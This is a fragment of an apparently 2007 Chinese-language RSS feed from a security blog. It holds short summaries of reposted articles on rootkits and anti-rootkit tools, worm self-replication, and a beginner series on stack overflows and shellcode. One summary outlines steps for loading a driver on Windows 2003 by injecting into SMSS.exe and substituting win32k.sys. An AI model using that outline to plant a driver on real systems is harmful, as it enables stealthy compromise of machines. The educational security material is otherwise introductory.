GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/12/29/171547.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/171547.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/12/29/171547.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/171547.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/171547.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: 现在RK（rootkit）和ARK(anti- rootkit)的斗争已经进行了很久，在印象中最早出来的ARK工具是冰刃(IceSword)，从冰刃开始出来到现在RK和ARK的斗争一直在继续，目前冰刃还是在流行当中，自己感觉也正是冰刃的出来才带动了当前流行的RK和ARK的斗争呵呵，现在很多病毒木马已经广泛的带有驱动,使用一些RK的技术和方法使自己更底层些更强大些，当前流行的ARK工具主要包括：隐藏进程检测，内核驱动检测，SSDT检测，代码HOOK检测，注册表隐藏的检测，隐藏文件的检测等一些功能的，下面谈谈自己对一些功能的简单愚见 嘻嘻。<br>..........<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/12/29/171547.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/171547.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-12-29 15:09 <a href="http://www.blogjava.net/baicker/archive/2007/12/29/171547.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>无耻的驱动加载法(ZT)</title><link>http://www.blogjava.net/baicker/archive/2007/12/29/171537.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Sat, 29 Dec 2007 06:59:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/12/29/171537.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/171537.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/12/29/171537.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/171537.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/171537.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: 方法一： 替换win32k.sys<br>在2k3的系统下ZwSetSystemInformation禁止了用户模式下加载驱动，只允许SMSS.exe加载win32k.sys。于是我们可以利用一下这个特点：<br>1. 注入SMSS.EXE<br>2. 打开SeLoadDriverPrivilege权限<br>3. 把原始的win32k.sys改名<br>4. 复制我们的驱动到\systemroot\system32下<br>5. 在SMSS.EXE中加载\\SystemRoot\\System32\\win32k.sys<br>6. 把\\SystemRoot\\System32\\win32k.sys改名<br>7. 把原始的win32k.sys文件改名改回去<br>..............<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/12/29/171537.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/171537.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-12-29 14:59 <a href="http://www.blogjava.net/baicker/archive/2007/12/29/171537.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>实例解析蠕虫病毒的原理(ZT)</title><link>http://www.blogjava.net/baicker/archive/2007/12/28/171227.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Fri, 28 Dec 2007 07:44:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/12/28/171227.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/171227.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/12/28/171227.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/171227.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/171227.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: 　　一、蠕虫病毒具有自我复制能力<br><br>　　我们以普通的VB脚本为例来看看： <br>JavaScript代码<br><br>   1. Set objFs=CreateObject ("Scripting.FileSystemObject")    <br>   2. '创建一个文件系统对象   <br>   3. objFs.CreateTextFile ("C:\virus.txt", 1)   <br>   4. '通过文件系统对象的方法创建了一个TXT文件。   <br>.....................<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/12/28/171227.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/171227.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-12-28 15:44 <a href="http://www.blogjava.net/baicker/archive/2007/12/28/171227.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>软件漏洞分析入门[初级shellcode_定位缓冲区](ZT)</title><link>http://www.blogjava.net/baicker/archive/2007/12/28/171225.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Fri, 28 Dec 2007 07:41:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/12/28/171225.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/171225.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/12/28/171225.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/171225.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/171225.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: 跟贴中看到已经有不少朋友成功的完成了前面的所有例题，今天我们在前面的基础上，继续深入。每一讲我都会引入一些新的知识和技术，但只有一点点，因为我希望在您读完贴之后就能立刻消化吸收，这是标准的循序渐进的案例式学习方法<br> <br>另外在今天开始之前，我顺便说一下后面的教学计划：<br> <br>我会再用3～4次的讲座来阐述shellcode技术，确保大家能够在比较简单的漏洞场景下实现通用、稳定的溢出利用程序（exploit）<br>..........<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/12/28/171225.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/171225.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-12-28 15:41 <a href="http://www.blogjava.net/baicker/archive/2007/12/28/171225.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>软件漏洞分析入门[初级栈溢出D_植入任意代码](ZT)</title><link>http://www.blogjava.net/baicker/archive/2007/12/28/171222.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Fri, 28 Dec 2007 07:40:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/12/28/171222.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/171222.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/12/28/171222.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/171222.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/171222.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: 麻雀虽小，五脏俱全<br><br>如果您顺利的学完了前面4讲的内容，并成功的完成了第2讲和第4讲中的实验，那么今天请跟我来一起挑战一下劫持有漏洞的进程，并向其植入恶意代码的实验，相信您成功完成这个实验后，学习的兴趣和自信心都会暴增。<br><br>开始之前，先简要的回答一下前几讲跟贴中提出的问题<br><br>代码编译少头文件问题：可能是个人习惯问题，哪怕几行长的程序我也会丢到project里去build，而不是用cl，所以没有注意细节。如果你们嫌麻烦，不如和我一样用project来build，应该没有问题的。否则的话，实验用的程序实在太简单了，这么一点小问题自己决绝吧。另外，看到几个同学说为了实验，专门恢复了古老的VC6.0，我也感动不已啊，呵呵。<br>...............<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/12/28/171222.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/171222.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-12-28 15:40 <a href="http://www.blogjava.net/baicker/archive/2007/12/28/171222.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>软件漏洞分析入门[初级栈溢出C_修改程序流程](ZT)</title><link>http://www.blogjava.net/baicker/archive/2007/12/28/171221.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Fri, 28 Dec 2007 07:39:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2007/12/28/171221.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/171221.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2007/12/28/171221.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/171221.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/171221.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: 上节课没有操练滴东西，不少蠢蠢欲动的同学肯定已经坐不住了。悟空，不要猴急，下面的两堂课都是实践课，用来在实践中深入体会上节课中的知识，并且很有趣味性哦<br><br>  信息安全技术是一个对技术性要求极高的领域，除了扎实的计算机理论基础外、更重要的是优秀的动手实践能力。在我看来，不懂二进制就无从谈起安全技术。<br><br>  缓冲区溢出的概念我若干年前已经了然于胸，不就是淹个返回地址把CPU指到缓冲区的shellcode去么。然而当我开始动手实践的时候，才发现实际中的情况远远比原理复杂。<br>................<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2007/12/28/171221.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/171221.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2007-12-28 15:39 <a href="http://www.blogjava.net/baicker/archive/2007/12/28/171221.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item></channel></rss>